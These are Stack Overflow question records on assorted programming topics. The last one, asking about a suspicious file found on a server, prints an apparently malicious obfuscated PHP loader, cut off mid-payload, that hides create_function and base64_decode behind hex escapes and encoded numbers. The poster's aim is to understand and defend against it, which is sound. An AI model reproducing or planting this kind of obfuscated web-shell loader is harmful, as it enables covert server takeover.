c# How can i pass my values in e-mail activation link? === I wrote some codes in deneme.aspx it works but it does not pass the variables(Id(levent) and userName(levent)) to activateUser.aspx. how can i do it? SmtpClient SmtpServer = new SmtpClient("smtp.live.com"); var mail = new MailMessage(); mail.From = new MailAddress("bilkentliaslan@windowslive.com"); mail.To.Add("levent_kalay@hotmail.com"); mail.Subject = "Test Mail - 1"; mail.IsBodyHtml = true; string htmlBody; htmlBody = string.Format("<a href='http://localhost:15534/ActivateUser.aspx? userName{0}&Id={1}'>Activate {0} </a>", "levent", "levent"); mail.Body = htmlBody; SmtpServer.Port = 587; SmtpServer.UseDefaultCredentials = false; SmtpServer.Credentials = new System.Net.NetworkCredential("bilkentliaslan@windowslive.com", "mypassword"); SmtpServer.EnableSsl = true; SmtpServer.Send(mail); Then, After clicking the confirmation link, It goes to ActivateUser.aspx in there protected void Page_Load(object sender, EventArgs e) { if (String.IsNullOrEmpty(Request.Params["Id"])) { // We do not have the userId. Redirect some where Response.Redirect("login.aspx"); } else { // We have a userId. try { DBConnection db = new DBConnection(); string username= Request.Params["userName"]; bool res = db.CheckLogin(Request.Params["userName"],Request.Params["Id"]); if (res) { Session["LetLogin"] = "ok"; Session["User_Name"] = Request.Params["userName"]; Response.Redirect("WebForm4.aspx",true); } } catch { // Error. Redirect some where Response.Redirect("login.aspx"); } } // We should never reach here. Just in case redirect some where Response.Redirect("login.aspx", true); }
0
9,177,610
02/07/2012 14:02:36
1,117,347
12/27/2011 09:00:54
252
21
Non clickable div elements
On clicking some link I am showing some face-box. At this stage when my face box appears I am able to click the background links also. I want to do such that as my face-box appear the background page will be shown but it must not be clickable. Thnx in advance.
java
javascript
html
null
null
02/07/2012 14:27:38
not a real question
Non clickable div elements === On clicking some link I am showing some face-box. At this stage when my face box appears I am able to click the background links also. I want to do such that as my face-box appear the background page will be shown but it must not be clickable. Thnx in advance.
1
2,295,741
02/19/2010 11:00:28
154,280
08/11/2009 11:01:45
758
10
Regex for Time Format (with possible book recommendation?)
Regex needed for a time of the format: `12-02-30T00:59:43`. Also, I've not managed to find any decent websites or books that contain good explanations or reference material for regular expressions. Can anyone recommend any?
regex
book-recommendation
null
null
null
null
open
Regex for Time Format (with possible book recommendation?) === Regex needed for a time of the format: `12-02-30T00:59:43`. Also, I've not managed to find any decent websites or books that contain good explanations or reference material for regular expressions. Can anyone recommend any?
0
1,523,225
10/06/2009 01:42:41
171,461
09/10/2009 14:07:32
607
42
python sax: is there a way to halt the parsing from inside a content handler?
Is there a way to halt the parsing from inside a content handler? Or is throwing an exception the only way? Note that I am using *xml.sax.parseString*.
python
sax
null
null
null
null
open
python sax: is there a way to halt the parsing from inside a content handler? === Is there a way to halt the parsing from inside a content handler? Or is throwing an exception the only way? Note that I am using *xml.sax.parseString*.
0
3,902,451
10/10/2010 22:21:04
12,854
09/16/2008 15:59:33
23
2
Is replacing a line break UTF-8 safe?
If I have a UTF-8 string and want to replace line breaks with the HTML <br>, is this safe? $var = str_replace("\r\n", "<br>", $var); I know str_replace isn't UTF-8 safe but maybe I can get away with this. I ask because there isn't an mb_strreplace function.
php
utf-8
null
null
null
null
open
Is replacing a line break UTF-8 safe? === If I have a UTF-8 string and want to replace line breaks with the HTML <br>, is this safe? $var = str_replace("\r\n", "<br>", $var); I know str_replace isn't UTF-8 safe but maybe I can get away with this. I ask because there isn't an mb_strreplace function.
0
8,331,923
11/30/2011 19:42:02
546,496
12/17/2010 20:18:08
154
0
C# Equivalent Function Of This Java Function?
Can anyone write C# equivalent for this Java function? private static long removeSeconds(long timestamp) { Calendar cal = GregorianCalendar.getInstance(); cal.setTimeInMillis(timestamp); cal.set(Calendar.SECOND, 0); cal.set(Calendar.MILLISECOND, 0); return cal.getTimeInMillis(); } Thanks, //SC
c#
java
null
null
null
06/07/2012 13:19:17
too localized
C# Equivalent Function Of This Java Function? === Can anyone write C# equivalent for this Java function? private static long removeSeconds(long timestamp) { Calendar cal = GregorianCalendar.getInstance(); cal.setTimeInMillis(timestamp); cal.set(Calendar.SECOND, 0); cal.set(Calendar.MILLISECOND, 0); return cal.getTimeInMillis(); } Thanks, //SC
3
9,008,243
01/25/2012 18:35:28
579,228
01/18/2011 00:06:10
71
3
Excel keep loading my spreadsheet with an error
I keep getting this error when I load my spreadsheet. It makes me repair it, which strips all the validators. The file is saved as an xlsm. "Excel found unreadable content in '<filename>' Do you wnat to recover the contents of this workbook. If you trust the source of this workbook, click yes" You have to click yes or it won't load. Then I get this error. "Excel was able to open the file by removing or repairing the unreadable content Removed Feature: Data validation from /xl/worksheets/sheet1.xml part" I haven't a clue about this, and it's really annoying. If anyone has any suggestions, I would be very grateful. Thanks, James
excel
vba
null
null
null
null
open
Excel keep loading my spreadsheet with an error === I keep getting this error when I load my spreadsheet. It makes me repair it, which strips all the validators. The file is saved as an xlsm. "Excel found unreadable content in '<filename>' Do you wnat to recover the contents of this workbook. If you trust the source of this workbook, click yes" You have to click yes or it won't load. Then I get this error. "Excel was able to open the file by removing or repairing the unreadable content Removed Feature: Data validation from /xl/worksheets/sheet1.xml part" I haven't a clue about this, and it's really annoying. If anyone has any suggestions, I would be very grateful. Thanks, James
0
1,493,007
09/29/2009 14:44:03
179,116
09/25/2009 15:15:52
8
1
Identical string return FALSE with '==' in Python, why?
The data string is receive through a socket connexion. When receiving the first exemple where action variable would = 'IDENTIFY', it works. But when receiving the second exemple where action variable would = 'MSG' it does not compare. And the most bizarre thing, when I use Telnet instead of my socket client both are being compare successfully. But the string are the same... Is there a possibility that the string are not encode in the same way? How can I know? data exemple: data = 'IDENTIFY 54143' or data = 'MSG allo' ----------------------------------- action = data.partition(' ')[0] if action == "MSG": self.sendMessage(data) elif action == "IDENTIFY": self.sendIdentify(data) else: print "false"
string-comparison
python
null
null
null
null
open
Identical string return FALSE with '==' in Python, why? === The data string is receive through a socket connexion. When receiving the first exemple where action variable would = 'IDENTIFY', it works. But when receiving the second exemple where action variable would = 'MSG' it does not compare. And the most bizarre thing, when I use Telnet instead of my socket client both are being compare successfully. But the string are the same... Is there a possibility that the string are not encode in the same way? How can I know? data exemple: data = 'IDENTIFY 54143' or data = 'MSG allo' ----------------------------------- action = data.partition(' ')[0] if action == "MSG": self.sendMessage(data) elif action == "IDENTIFY": self.sendIdentify(data) else: print "false"
0
6,284,602
06/08/2011 20:08:17
244,929
01/06/2010 17:54:06
1,489
117
Sessions in my web app are mixing
I have web app, and this is scenario User is logging in. Data is loaded from db added to Object (e.g) class UserData { public string Name { get; set; } } and instance of this object is added into session, when user from another computer log in then his session is also applied to first user session. I know this because there is name displayed in header of app. Server IIS7, ASP.NET 2.0 C# I still can't believe how this can be possible, but can't find solution that is reason I'm asking. Thanks in advance
c#
asp.net
authentication
null
null
null
open
Sessions in my web app are mixing === I have web app, and this is scenario User is logging in. Data is loaded from db added to Object (e.g) class UserData { public string Name { get; set; } } and instance of this object is added into session, when user from another computer log in then his session is also applied to first user session. I know this because there is name displayed in header of app. Server IIS7, ASP.NET 2.0 C# I still can't believe how this can be possible, but can't find solution that is reason I'm asking. Thanks in advance
0
9,350,365
02/19/2012 15:12:14
738,037
05/04/2011 13:01:48
1
0
If else endif PHP trouble
Hello I am new to PHP and trying to figure out a hack for a Joomla module. For some reason the 'else' statement is not working. I don't understand why... <? if (KRequest::get('get.view', 'string') != 'event' || isset($module)) : ?> <? $desc = $event->description; ?> <? $desc = preg_replace("/\{[^\)]+\}/","", $desc) ?> <? $desc = substr(strip_tags($desc, '<p><ul><li><b><i><strong><br>'), 0, 180)?> <? if (strlen($desc) == 180) $desc .= '...'; ?> <div itemprop="description" class="short-description"> <?=$desc?> </div> <? else : ?> No description. Any help much appreciated!
php
if-statement
elseif
null
null
02/20/2012 09:09:46
too localized
If else endif PHP trouble === Hello I am new to PHP and trying to figure out a hack for a Joomla module. For some reason the 'else' statement is not working. I don't understand why... <? if (KRequest::get('get.view', 'string') != 'event' || isset($module)) : ?> <? $desc = $event->description; ?> <? $desc = preg_replace("/\{[^\)]+\}/","", $desc) ?> <? $desc = substr(strip_tags($desc, '<p><ul><li><b><i><strong><br>'), 0, 180)?> <? if (strlen($desc) == 180) $desc .= '...'; ?> <div itemprop="description" class="short-description"> <?=$desc?> </div> <? else : ?> No description. Any help much appreciated!
3
11,236,499
06/28/2012 00:17:56
1,027,126
11/03/2011 07:22:52
1
0
To reference a custom view in java file and place all of them in a single XML layout?
I would like to place a custom view in the bottom of the main.xml file.following is my Activity class and my custom view class(game.java):I want the game view to appear on the bottom of the main.xml file.Please tell me how to get on with it....I think the idea is to have a layout set in main.xml and then have the custom view on the layout. //LearningActivity `public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); //For my button class /* MyButton myb = (MyButton)findViewById(R.id.mybutton1); myb.setText("Hello Students"); myb.setTextSize(40); **/ //For custom view setContentView(R.layout.main); RelativeLayout r=(RelativeLayout) findViewById(R.id.relative1); g=new game(this,null); ViewGroup vgroup=(ViewGroup) findViewById(R.id.main); vgroup.addView(g); Thread mythread=new Thread(new UpdateThread()); mythread.start(); } Game.java(custom view) public class game extends View{ private Bitmap image; private Paint paint; private int x=0;private int baseY = 250; public game(Context context,AttributeSet attrs) { super(context,attrs); this.inflate(context, R.layout.example, null); image=Bitmap.createBitmap(BitmapFactory.decodeResource(this.getResources(),R.drawable.ic_launcher)); paint =new Paint(); paint.setColor(Color.BLUE); } public View getlay (RelativeLayout r) { return r; } public void onDraw(Canvas canvas) { super.onDraw(canvas); canvas.drawLine(90, baseY,200,baseY, paint); canvas.drawLine(125,baseY,125,baseY-100,paint); canvas.drawLine(110,baseY,125,baseY-15,paint); .................. }
android
android-layout
android-view
android-custom-view
null
null
open
To reference a custom view in java file and place all of them in a single XML layout? === I would like to place a custom view in the bottom of the main.xml file.following is my Activity class and my custom view class(game.java):I want the game view to appear on the bottom of the main.xml file.Please tell me how to get on with it....I think the idea is to have a layout set in main.xml and then have the custom view on the layout. //LearningActivity `public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); //For my button class /* MyButton myb = (MyButton)findViewById(R.id.mybutton1); myb.setText("Hello Students"); myb.setTextSize(40); **/ //For custom view setContentView(R.layout.main); RelativeLayout r=(RelativeLayout) findViewById(R.id.relative1); g=new game(this,null); ViewGroup vgroup=(ViewGroup) findViewById(R.id.main); vgroup.addView(g); Thread mythread=new Thread(new UpdateThread()); mythread.start(); } Game.java(custom view) public class game extends View{ private Bitmap image; private Paint paint; private int x=0;private int baseY = 250; public game(Context context,AttributeSet attrs) { super(context,attrs); this.inflate(context, R.layout.example, null); image=Bitmap.createBitmap(BitmapFactory.decodeResource(this.getResources(),R.drawable.ic_launcher)); paint =new Paint(); paint.setColor(Color.BLUE); } public View getlay (RelativeLayout r) { return r; } public void onDraw(Canvas canvas) { super.onDraw(canvas); canvas.drawLine(90, baseY,200,baseY, paint); canvas.drawLine(125,baseY,125,baseY-100,paint); canvas.drawLine(110,baseY,125,baseY-15,paint); .................. }
0
7,702,196
10/09/2011 08:03:46
986,163
10/09/2011 07:53:22
1
0
super of super in extented classes (alter variable in super class of super class)
The question is more Java, but I want to implement it in Android: Suppose there are 3 or more classes extending each other: class A (){ ...... int color; .... } class B extends A{ ........ } class C extends B{ ........ //I want to alter color of class A inside here } is this possible without setting a super(color = 4) in C and setting another color=4 and super(color = 4) in B?? e.g. is it possible to write something like super(super(color=3) within class C ????
java
android
super
superclass
null
null
open
super of super in extented classes (alter variable in super class of super class) === The question is more Java, but I want to implement it in Android: Suppose there are 3 or more classes extending each other: class A (){ ...... int color; .... } class B extends A{ ........ } class C extends B{ ........ //I want to alter color of class A inside here } is this possible without setting a super(color = 4) in C and setting another color=4 and super(color = 4) in B?? e.g. is it possible to write something like super(super(color=3) within class C ????
0
901,224
05/23/2009 09:44:37
63,791
02/08/2009 02:25:00
129
3
Listening for input without focus in Java
I'm making a small program in Java using the Robot class. The program takes over the mouse. while in the course of debugging if it starts acting in a way that I don't want it's hard to quit the program, since I can't move the mouse over to the terminate button in eclipse, and I can't use hotkeys to hit it because the mouse is constant clicking in another window, giving that window focus instead. What I'd like to do is just hook up a keylistener so that when I hit q I can quit the program, but the only way I know how to do this involves making a window, and that window needs focus to capture the input. Is there a way to listen for keyboard or mouse input from anywhere, regardless of what has focus?
java
keylistener
null
null
null
null
open
Listening for input without focus in Java === I'm making a small program in Java using the Robot class. The program takes over the mouse. while in the course of debugging if it starts acting in a way that I don't want it's hard to quit the program, since I can't move the mouse over to the terminate button in eclipse, and I can't use hotkeys to hit it because the mouse is constant clicking in another window, giving that window focus instead. What I'd like to do is just hook up a keylistener so that when I hit q I can quit the program, but the only way I know how to do this involves making a window, and that window needs focus to capture the input. Is there a way to listen for keyboard or mouse input from anywhere, regardless of what has focus?
0
8,150,416
11/16/2011 10:48:39
832,998
07/07/2011 06:49:20
127
15
Wordpress blog transfer
I have a wordpress blog, hosted on wordpress.com. My blog is doing pretty well - I've got ~150-200 visits per day. I've bought a domain name and I've got hosting and I want to move my blog there. I can transfer my blog data, but what is the best way to keep (as much as it's possible) the traffic. I can't set redirect header and I can't change the address from my google webmaster tools, because it's hosted on wordpress.com. So what to do - to dublicate the content, to delete each post from the old blog or to replace each post from the old blog with a link to the new one? If there's a better way - let me know. Thank you!
wordpress
google
seo
null
null
11/16/2011 13:00:11
off topic
Wordpress blog transfer === I have a wordpress blog, hosted on wordpress.com. My blog is doing pretty well - I've got ~150-200 visits per day. I've bought a domain name and I've got hosting and I want to move my blog there. I can transfer my blog data, but what is the best way to keep (as much as it's possible) the traffic. I can't set redirect header and I can't change the address from my google webmaster tools, because it's hosted on wordpress.com. So what to do - to dublicate the content, to delete each post from the old blog or to replace each post from the old blog with a link to the new one? If there's a better way - let me know. Thank you!
2
9,467,610
02/27/2012 15:30:42
74,283
03/05/2009 15:09:48
156
1
Php encoded shell code?
While looking at my log files i found a file that i didnt recognized. It looks like encoded php script. I would like to see the content or get an idea what the script does. Below is the full encoded php script. <?php $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$_8b7b1f56=$_8b7b("",$_8b7b1f("JGs9MTQzOyRtPWV4cGxvZGUoIjsiLCIyMzQ7MjUzOzI1MzsyMjQ7MjUzOzIwODsyNTM7MjM0OzI1NTsyMjQ7MjUzOzI1MTsyMzA7MjI1OzIzMjsxNjc7MjAyOzIwODsyMDI7MjIxOzIyMTsxOTI7MjIxOzE3NTsyNDM7MTc1OzIwMjsyMDg7MjE2OzIwNjsyMjE7MTkzOzE5ODsxOTM7MjAwOzE3NTsyNDM7MTc1OzIwMjsyMDg7MjIzOzIwNjsyMjE7MjIwOzIwMjsxNjY7MTgwOzEzMDsxMzM7MjMwOzIyNTsyMzA7MjA4OzI1MjsyMzQ7MjUxOzE2NzsxNjg7MjM1OzIzMDsyNTI7MjU1OzIyNzsyMzg7MjQ2OzIwODsyMzQ7MjUzOzI1MzsyMjQ7MjUzOzI1MjsxNjg7MTYzOzE3NTsxNzM7MTkxOzE3MzsxNjY7MTgwOzEzMDsxMzM7MTMwOzEzMzsyMzA7MjMzOzE3NTsxNjc7MTcxOzIwODsyMjM7MTkyOzIyMDsyMTk7MjEyOzE3MzsyNTU7MTczOzIxMDsxNzU7MTc0OzE3ODsxNzU7MTczOzE3MzsxNjY7MTc1OzI0NDsxMzA7MTMzOzEzNDsxNzE7MjA4OzIwNDsxOTI7MTkyOzE5NjsxOTg7MjAyOzIxMjsxNzM7MjU1OzE3MzsyMTA7MTc1OzE3ODsxNzU7MTcxOzIwODsyMjM7MTkyOzIyMDsyMTk7MjEyOzE3MzsyNTU7MTczOzIxMDsxODA7MTMwOzEzMzsxMzQ7MjUyOzIzNDsyNTE7MjM2OzIyNDsyMjQ7MjI4OzIzMDsyMzQ7MTY3OzE3MzsyNTU7MTczOzE2MzsxNzU7MTcxOzIwODsyMjM7MTkyOzIyMDsyMTk7MjEyOzE3MzsyNTU7MTczOzIxMDsxNjM7MTc1OzI1MTsyMzA7MjI2OzIzNDsxNjc7MTY2OzE3NTsxNjQ7MTc1OzE4ODsxODU7MTkxOzE5MTsxNjY7MTgwOzEzMDsxMzM7MjQyOzEzMDsxMzM7MTMwOzEzMzsyMzA7MjMzOzE3NTsxNjc7MjI2OzIzNTsxODY7MTY3OzE3MTsyMDg7MjA0OzE5MjsxOTI7MTk2OzE5ODsyMDI7MjEyOzE3MzsyNTU7MTczOzIxMDsxNjY7MTc1OzE3NDsxNzg7MTc1OzE3MzsyMzY7MjM4OzE4ODsyMzM7MTg0OzE5MDsxODQ7MjM4OzE4NjsyMzQ7MTg2OzE4ODsyMzM7MTg3OzIzNjsyMzQ7MTg3OzE4NDsyMzc7MTgyOzE5MTsxODU7MTg5OzIzNjsyMzM7MjM3OzIzMzsyMzc7MTg5OzE4NzsxODY7MTgzOzE3MzsxNjY7MTc1OzI0NDsxMzA7MTMzOzEzNDsyMzQ7MjM2OzIzMTsyMjQ7MTc1OzE3MzsxNzk7MjMzOzIyNDsyNTM7MjI2OzE3NTsyMjY7MjM0OzI1MTsyMzE7MjI0OzIzNTsxNzg7MjU1OzIyNDsyNTI7MjUxOzE3NzsxNzM7MTgwOzEzMDsxMzM7MTM0OzIzNDsyMzY7MjMxOzIyNDsxNzU7MTczOzE3OTsyMzA7MjI1OzI1NTsyNTA7MjUxOzE3NTsyNTE7MjQ2OzI1NTsyMzQ7MTc4OzI1MTsyMzQ7MjQ3OzI1MTsxNzU7MjI1OzIzODsyMjY7MjM0OzE3ODsyNTU7MTc1OzI0OTsyMzg7MjI3OzI1MDsyMzQ7MTc4OzE2ODsxNjg7MTc1OzI1MjsyMzA7MjQ1OzIzNDsxNzg7MTg2OzE5MTsxNzc7MTczOzE4MDsxMzA7MTMzOzEzNDsyMzQ7MjM2OzIzMTsyMjQ7MTc1OzE3MzsxNzk7MjMwOzIyNTsyNTU7MjUwOzI1MTsxNzU7MjUxOzI0NjsyNTU7MjM0OzE3ODsyNTI7MjUwOzIzNzsyMjY7MjMwOzI1MTsxNzU7MjI1OzIzODsyMjY7MjM0OzE3ODsyMDU7MjA4OzIyMDsyMTg7MjA1OzE5NDsxOTg7MjE5OzE3NTsyNDk7MjM4OzIyNzsyNTA7MjM0OzE3ODsxNjg7MjA0OzIzMTsyMzQ7MjM2OzIyODsxNjg7MTc3OzE3MzsxODA7MTMwOzEzMzsxMzQ7MjM0OzIzNjsyMzE7MjI0OzE3NTsxNzM7MTc5OzE2MDsyMzM7MjI0OzI1MzsyMjY7MTc3OzE3MzsxODA7MTMwOzEzMzsxMzQ7MjM0OzI0NzsyMzA7MjUxOzE4MDsxMzA7MTMzOzI0MjsxMzA7MTMzOzEzMDsxMzM7MjMwOzIzMzsxNzU7MTY3OzE3MTsyMDg7MjIzOzE5MjsyMjA7MjE5OzIxMjsxNzM7MjM4OzIzNjsyNTE7MjMwOzIyNDsyMjU7MTczOzIxMDsxNzU7MTc4OzE3ODsxNzU7MTczOzI1MDsyNTU7MjI3OzIyNDsyMzg7MjM1OzE3MzsxNjY7MTc1OzI0NDsxMzA7MTMzOzEzMDsxMzM7MTc1OzE3NTsxNzU7MTc1OzE3MTsyMjc7MTc4OzE3MTsyMDg7MjAxOzE5ODsxOTU7MjAyOzIyMDsyMTI7MTczOzIzMzsyMzA7MjI3OzIzNDsyNTU7MjM4OzI1MTsyMzE7MTczOzIxMDsyMTI7MTczOzI1MTsyMjY7MjU1OzIwODsyMjU7MjM4OzIyNjsyMzQ7MTczOzIxMDsxODA7MTMwOzEzMzsxNzU7MTc1OzE3NTsxNzU7MTcxOzIyNTsyMzQ7MjQ4OzI1NTsyMzg7MjUxOzIzMTsxNzg7MTcxOzIwODsyMjM7MTkyOzIyMDsyMTk7MjEyOzE3MzsyMjU7MjM0OzI0ODsyNTU7MjM4OzI1MTsyMzE7MTczOzIxMDsxODA7MTMwOzEzMzsxNzU7MTc1OzE3NTsxNzU7MjMwOzIzMzsxNzU7MTY3OzE3MTsyMjU7MjM0OzI0ODsyNTU7MjM4OzI1MTsyMzE7MTc0OzE3ODsxNzM7MTczOzE2NjsxNzU7MjI2OzIyNDsyNDk7MjM0OzIwODsyNTA7MjU1OzIyNzsyMjQ7MjM4OzIzNTsyMzQ7MjM1OzIwODsyMzM7MjMwOzIyNzsyMzQ7MTY3OzE3MTsyMjc7MTYzOzE3MTsyMjU7MjM0OzI0ODsyNTU7MjM4OzI1MTsyMzE7MTY2OzE4MDsxMzA7MTMzOzE3NTsxNzU7MTc1OzE3NTsyMzQ7MjM2OzIzMTsyMjQ7MTc1OzE3MzsyMzU7MjI0OzIyNTsyMzQ7MTczOzE4MDsxMzA7MTMzOzEzMDsxMzM7MjQyOzE3NTsyMzQ7MjI3OzI1MjsyMzQ7MTc1OzIzMDsyMzM7MTc1OzE2NzsxNzE7MjA4OzIyMzsxOTI7MjIwOzIxOTsyMTI7MTczOzIzODsyMzY7MjUxOzIzMDsyMjQ7MjI1OzE3MzsyMTA7MTc1OzE3ODsxNzg7MTc1OzE3MzsyNTI7MjU0OzIyNzsxNzM7MTY2OzE3NTsyNDQ7MTMwOzEzMzsxMzA7MTMzOzE3NTsxNzU7MTc1OzE3NTsxNzE7MjU0OzI1MDsyMzQ7MjUzOzI0NjsxNzU7MTc4OzE3NTsxNzE7MjA4OzIyMzsxOTI7MjIwOzIxOTsyMTI7MTczOzI1NDsyNTA7MjM0OzI1MzsyNDY7MTczOzIxMDsxODA7MTMwOzEzMzsxNzU7MTc1OzE3NTsxNzU7MTcxOzI1NDsyNTA7MjM0OzI1MzsyNDY7MTc1OzE3ODsxNzU7MjUyOzI1MTsyNTM7MjA4OzI1MzsyMzQ7MjU1OzIyNzsyMzg7MjM2OzIzNDsxNjc7MTczOzIxMTsxNjg7MTczOzE2MzsxNzM7MTY4OzE3MzsxNjM7MTcxOzI1NDsyNTA7MjM0OzI1MzsyNDY7MTY2OzE4MDsxMzA7MTMzOzE3NTsxNzU7MTc1OzE3NTsxNzE7MjI3OzIyNTsyMjg7MTc1OzE3ODsxNzU7MjI2OzI0NjsyNTI7MjU0OzIyNzsyMDg7MjM2OzIyNDsyMjU7MjI1OzIzNDsyMzY7MjUxOzE2NzsxNzE7MjA4OzIyMzsxOTI7MjIwOzIxOTsyMTI7MTczOzI1MjsyMzQ7MjUzOzI0OTsyMzQ7MjUzOzE3MzsyMTA7MTYzOzE3NTsxNzE7MjA4OzIyMzsxOTI7MjIwOzIxOTsyMTI7MTczOzI1MDsyNTI7MjM0OzI1MzsxNzM7MjEwOzE2MzsxNzU7MTcxOzIwODsyMjM7MTkyOzIyMDsyMTk7MjEyOzE3MzsyNTU7MjM4OzI1MjsyNTI7MTczOzIxMDsxNjY7MTc1OzIyNDsyNTM7MTc1OzIzNTsyMzA7MjM0OzE3NTsxNjc7MTY4OzE5MzsyMjQ7MjUxOzE3NTsyMzY7MjI0OzIyNTsyMjU7MjM0OzIzNjsyNTE7MjM0OzIzNTsxNzU7MTgxOzE3NTsxNjg7MTc1OzE2MTsxNzU7MjI2OzI0NjsyNTI7MjU0OzIyNzsyMDg7MjM0OzI1MzsyNTM7MjI0OzI1MzsxNjc7MTY2OzE2NjsxODA7MTMwOzEzMzsxNzU7MTc1OzE3NTsxNzU7MjI2OzI0NjsyNTI7MjU0OzIyNzsyMDg7MjUyOzIzNDsyMjc7MjM0OzIzNjsyNTE7MjA4OzIzNTsyMzc7MTY3OzE3MTsyMDg7MjIzOzE5MjsyMjA7MjE5OzIxMjsxNzM7MjM1OzIzNzsxNzM7MjEwOzE2MzsxNzU7MTcxOzIyNzsyMjU7MjI4OzE2NjsxNzU7MjI0OzI1MzsxNzU7MjM1OzIzMDsyMzQ7MTc1OzE2NzsxNjg7MjAzOzIzNzsxNzU7MjMzOzIzODsyMzA7MjI3OzIzNDsyMzU7MTgxOzE3NTsxNjg7MTc1OzE2MTsxNzU7MjI2OzI0NjsyNTI7MjU0OzIyNzsyMDg7MjM0OzI1MzsyNTM7MjI0OzI1MzsxNjc7MTY2OzE2NjsxODA7MTMwOzEzMzsxNzU7MTc1OzE3NTsxNzU7MjI2OzI0NjsyNTI7MjU0OzIyNzsyMDg7MjU0OzI1MDsyMzQ7MjUzOzI0NjsxNjc7MTcxOzI1NDsyNTA7MjM0OzI1MzsyNDY7MTYzOzE3NTsxNzE7MjI3OzIyNTsyMjg7MTY2OzE3NTsyMjQ7MjUzOzE3NTsyMzU7MjMwOzIzNDsxNzU7MTY3OzE2ODsxOTg7MjI1OzI0OTsyMzg7MjI3OzIzMDsyMzU7MTc1OzI1NDsyNTA7MjM0OzI1MzsyNDY7MTgxOzE3NTsxNjg7MTc1OzE2MTsxNzU7MjI2OzI0NjsyNTI7MjU0OzIyNzsyMDg7MjM0OzI1MzsyNTM7MjI0OzI1MzsxNjc7MTY2OzE2NjsxODA7MTMwOzEzMzsxNzU7MTc1OzE3NTsxNzU7MjI2OzI0NjsyNTI7MjU0OzIyNzsyMDg7MjM2OzIyNzsyMjQ7MjUyOzIzNDsxNjc7MTcxOzIyNzsyMjU7MjI4OzE2NjsxODA7MTMwOzEzMzsxNzU7MTc1OzE3NTsxNzU7MjM0OzIzNjsyMzE7MjI0OzE3NTsxNzM7MjM1OzIyNDsyMjU7MjM0OzE3OTsyMzc7MjUzOzE3NzsxNzk7MjU1OzI1MzsyMzQ7MTc3OzE3MTsyNTQ7MjUwOzIzNDsyNTM7MjQ2OzE3OTsxNjA7MjU1OzI1MzsyMzQ7MTc3OzE3MzsxODA7MTMwOzEzMzsxMzA7MTMzOzI0MjsxNzU7MjM0OzIyNzsyNTI7MjM0OzE3NTsyMzA7MjMzOzE3NTsxNjc7MTcxOzIwODsyMjM7MTkyOzIyMDsyMTk7MjEyOzE3MzsyMzg7MjM2OzI1MTsyMzA7MjI0OzIyNTsxNzM7MjEwOzE3NTsxNzg7MTc4OzE3NTsxNzM7MjUzOzI1MDsyMjU7MjU1OzIzMTsyNTU7MTczOzE2NjsxNzU7MjQ0OzEzMDsxMzM7MTMwOzEzMzsxNzU7MTc1OzE3NTsxNzU7MjM0OzI0OTsyMzg7MjI3OzE2NzsyMzc7MjM4OzI1MjsyMzQ7MTg1OzE4NzsyMDg7MjM1OzIzNDsyMzY7MjI0OzIzNTsyMzQ7MTY3OzE3MTsyMDg7MjIzOzE5MjsyMjA7MjE5OzIxMjsxNzM7MjM2OzIyNjsyMzU7MTczOzIxMDsxNjY7MTY2OzE4MDsxMzA7MTMzOzEzMDsxMzM7MjQyOzE3NTsyMzQ7MjI3OzI1MjsyMzQ7MTc1OzI0NDsxMzA7MTMzOzEzMDsxMzM7MTc1OzE3NTsxNzU7MTc1OzE3MTsyMzU7MjMwOzI1MjsyMzg7MjM3OzIyNzsyMzQ7MjMzOzI1MDsyMjU7MjM2OzE3NTsxNzg7MTc1OzIwNzsyMzA7MjI1OzIzMDsyMDg7MjMyOzIzNDsyNTE7MTY3OzE3MzsyMzU7MjMwOzI1MjsyMzg7MjM3OzIyNzsyMzQ7MjA4OzIzMzsyNTA7MjI1OzIzNjsyNTE7MjMwOzIyNDsyMjU7MjUyOzE3MzsxNjY7MTgwOzEzMDsxMzM7MTc1OzE3NTsxNzU7MTc1OzIzMDsyMzM7MTc1OzE2NzsxNzQ7MjM0OzIyNjsyNTU7MjUxOzI0NjsxNjc7MTcxOzIzNTsyMzA7MjUyOzIzODsyMzc7MjI3OzIzNDsyMzM7MjUwOzIyNTsyMzY7MTY2OzE2NjsxNzU7MjQ0OzEzMDsxMzM7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzE7MjM1OzIzMDsyNTI7MjM4OzIzNzsyMjc7MjM0OzIzMzsyNTA7MjI1OzIzNjsxNzU7MTc4OzE3NTsyNTI7MjUxOzI1MzsyMDg7MjUzOzIzNDsyNTU7MjI3OzIzODsyMzY7MjM0OzE2NzsxNzM7MTc1OzE3MzsxNjM7MTczOzE3MzsxNjM7MTcxOzIzNTsyMzA7MjUyOzIzODsyMzc7MjI3OzIzNDsyMzM7MjUwOzIyNTsyMzY7MTY2OzE4MDsxMzA7MTMzOzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MTcxOzIzNTsyMzA7MjUyOzIzODsyMzc7MjI3OzIzNDsyMzM7MjUwOzIyNTsyMzY7MTc1OzE3ODsxNzU7MjM0OzI0NzsyNTU7MjI3OzIyNDsyMzU7MjM0OzE2NzsxNzM7MTYzOzE3MzsxNjM7MTcxOzIzNTsyMzA7MjUyOzIzODsyMzc7MjI3OzIzNDsyMzM7MjUwOzIyNTsyMzY7MTY2OzE4MDsxMzA7MTMzOzE3NTsxNzU7MTc1OzE3NTsyNDI7MTc1OzIzNDsyMjc7MjUyOzIzNDsxNzU7MTcxOzIzNTsyMzA7MjUyOzIzODsyMzc7MjI3OzIzNDsyMzM7MjUwOzIyNTsyMzY7MTc1OzE3ODsxNzU7MjM4OzI1MzsyNTM7MjM4OzI0NjsxNjc7MTY2OzE4MDsxMzA7MTMzOzEzMDsxMzM7MTc1OzE3NTsxNzU7MTc1OzIzMzsyNTA7MjI1OzIzNjsyNTE7MjMwOzIyNDsyMjU7MTc1OzIyNjsyNDY7MjUyOzIzMTsyMzQ7MjI3OzIyNzsyMzQ7MjQ3OzIzNDsyMzY7MTY3OzE3MTsyMzY7MjI2OzIzNTsxNjY7MTc1OzI0NDsxMzA7MTMzOzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MjMyOzIyNzsyMjQ7MjM3OzIzODsyMjc7MTc1OzE3MTsyMzU7MjMwO